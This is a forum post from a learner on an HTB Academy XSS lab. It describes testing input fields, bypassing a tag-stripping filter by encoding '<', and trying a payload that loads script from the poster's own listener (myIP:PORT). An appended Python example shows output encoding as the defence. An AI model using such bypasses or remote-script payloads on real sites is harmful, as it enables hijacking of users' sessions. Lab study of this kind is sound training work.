Hello everyone!
I’m getting stuck with the Final Assessment of the XSS module on HTB Academy.
Apart from the fact that the target website does not store comments anymore (I don’t know why; I also tried to reset the machine, but I always get the same target IP address), I approached the problem in the following way:
On the index page, at http://10.129.222.0/assessment/index.php, I have only one search input. I tried to inject any XSS payload and I get a message like “Results for “””, so it seems like it does not filter my input, even though nothing is triggered.
Then, I moved to welcome-to-security-blog page, where I can see different input forms: Comment, Name, Email, Website.
Among these forms, the Email form requires an email pattern, and the Website form adds “http://” at the beginning of the text I inject, so I would exclude these two forms.
Analyzing the Comment and Name forms, I noted that they filter the inputs, so I guess one of them should be vulnerable. My suspicion focuses more on Name, where the filter deletes all content between “<” and “>”, so my solution was to encode the “<” char as “<”. With this approach, when I publish (and check the stored) comment, the Name with my XSS injection text is shown in full, and the Name value is linked with the Website form. Anyway, despite this, when I use payloads like alert() or src=http://myIP:PORT/script.js (by running a listener on PORT on my machine), I don’t get anything. Of course, I tried this approach for the Comment form as well.
Is my current approach correct or am I totally wrong? Should I check also other kinds of tags?
Thank you in advance!
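The post describes a filter that deletes everything between “<” and “>” and a Name value that ends up linked to the Website value. The following added example (not from the lab or the poster) contrasts that kind of strip-based filter with output encoding, the control the XSS module teaches; the comment template and the `is_safe_text` check are assumptions for illustration only.

```python
import html
import re

# Naive sanitizer of the kind the post describes: remove everything between '<' and '>'.
TAG_RE = re.compile(r"<[^>]*>")


def strip_tags(value: str) -> str:
    """Delete tag-like spans. Lossy for ordinary text and not a substitute for encoding."""
    return TAG_RE.sub("", value)


def escape_output(value: str) -> str:
    """Encode at output time so the browser always treats user data as text, not markup.
    quote=True also escapes '"' and "'", which matters inside attributes such as href."""
    return html.escape(value, quote=True)


def render_comment(name: str, website: str, comment: str) -> str:
    """Constructed stand-in for the blog's comment block (assumption, not the lab's code):
    the name is rendered as a link to the website, as the post observes."""
    return (
        f'<div class="comment">'
        f'<a href="{escape_output(website)}">{escape_output(name)}</a>'
        f"<p>{escape_output(comment)}</p></div>"
    )


def is_safe_text(encoded: str) -> bool:
    """Defender-side check: after encoding, no raw markup or quote characters remain."""
    return not any(ch in encoded for ch in '<>"\'')


if __name__ == "__main__":
    # Constructed sample inputs, including legitimate text that a strip filter would mangle.
    print(strip_tags("5 < 6 and 7 > 3"))            # legitimate text loses content
    print(escape_output("5 < 6 and 7 > 3"))         # same text survives, safely encoded
    print(render_comment("Alice <b>", "https://example.invalid/?q=\"x\"", "a < b"))
```

Note that the strip filter both destroys harmless input and leaves already-encoded text untouched, which is why the module recommends context-aware output encoding rather than deleting tag-like spans.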